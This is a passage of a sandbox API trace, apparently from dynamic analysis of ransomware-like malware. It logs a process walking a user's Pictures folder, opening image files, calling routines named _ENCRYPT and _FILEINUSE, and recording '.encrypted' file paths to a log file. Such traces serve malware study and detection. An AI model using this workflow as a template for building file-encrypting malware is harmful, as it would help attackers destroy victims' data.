ftLastAccessTime.dwLowDateTime=0x76997d50, ftLastAccessTime.dwHighDateTime=0x1d5c486, ftLastWriteTime.dwLowDateTime=0x171ecac0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x131c1, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="61Ot9 dm-iOBUGP.jpg", cAlternateFileName="61OT9D~1.JPG")) returned 0 [0039.291] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0039.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0039.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0039.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0039.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0039.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0039.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0039.291] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0039.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0039.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0039.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af408 [0039.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0039.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0039.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0039.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd90 [0039.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0039.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0039.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0039.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0039.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0039.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0039.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0039.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0039.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0039.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0039.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0039.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0039.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.292] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0039.292] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.292] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0039.293] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.293] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0039.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0039.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.293] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0039.293] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2895, lpOverlapped=0x0) returned 1 [0039.293] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0039.293] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x2895, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.293] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0039.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0039.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0039.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.encrypted.jpg\r\n", cchWideChar=71, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 71 [0039.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x47) returned 0x88e138 [0039.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.encrypted.jpg\r\n", cchWideChar=71, lpMultiByteStr=0x88e138, cbMultiByte=71, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.encrypted.jpg\r\n", lpUsedDefaultChar=0x0) returned 71 [0039.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0039.293] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0039.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0039.293] WriteFile (in: hFile=0x140, lpBuffer=0x7f3630*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3630*, lpNumberOfBytesWritten=0x6aee3c*=0x46, lpOverlapped=0x0) returned 1 [0039.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0039.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.294] CloseHandle (hObject=0x140) returned 1 [0039.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0039.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0039.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0039.294] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.295] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.295] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.295] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.295] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0039.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0039.295] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0039.295] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0039.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0039.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0039.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0039.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0039.295] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0039.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0039.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0039.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0039.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0039.295] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0039.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0039.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cee0 [0039.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cee0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0039.296] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AfpZd.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\afpzd.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0039.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0039.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0039.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0039.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0039.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0039.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0039.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.296] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.296] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0039.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0039.296] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0039.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0039.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0039.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0039.296] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0039.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0039.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0039.297] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0039.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0039.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0039.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8e0 [0039.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c8e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0039.297] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.297] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0039.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0039.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0039.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0039.297] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0039.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0039.297] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0039.297] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0039.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0039.297] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0039.297] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0039.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0039.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0039.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0039.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0039.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.298] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0039.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0039.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0039.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0039.298] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.298] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0039.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0039.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0039.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0039.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0039.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0039.298] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AfpZd.png", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44d72d00, ftCreationTime.dwHighDateTime=0x1d5b912, ftLastAccessTime.dwLowDateTime=0x9572e040, ftLastAccessTime.dwHighDateTime=0x1d5bcd4, ftLastWriteTime.dwLowDateTime=0x9572e040, ftLastWriteTime.dwHighDateTime=0x1d5bcd4, nFileSizeHigh=0x0, nFileSizeLow=0x5fbe, dwReserved0=0x0, dwReserved1=0x777648, cFileName="AfpZd.png", cAlternateFileName="")) returned 0x7c20c0 [0039.298] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0039.299] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0039.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0039.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0039.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0039.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0039.299] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AfpZd.png", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44d72d00, ftCreationTime.dwHighDateTime=0x1d5b912, ftLastAccessTime.dwLowDateTime=0x9572e040, ftLastAccessTime.dwHighDateTime=0x1d5bcd4, ftLastWriteTime.dwLowDateTime=0x9572e040, ftLastWriteTime.dwHighDateTime=0x1d5bcd4, nFileSizeHigh=0x0, nFileSizeLow=0x5fbe, dwReserved0=0x0, dwReserved1=0x777648, cFileName="AfpZd.png", cAlternateFileName="")) returned 0x7c20c0 [0039.299] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0039.299] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0039.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0039.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\AfpZd.png\"", 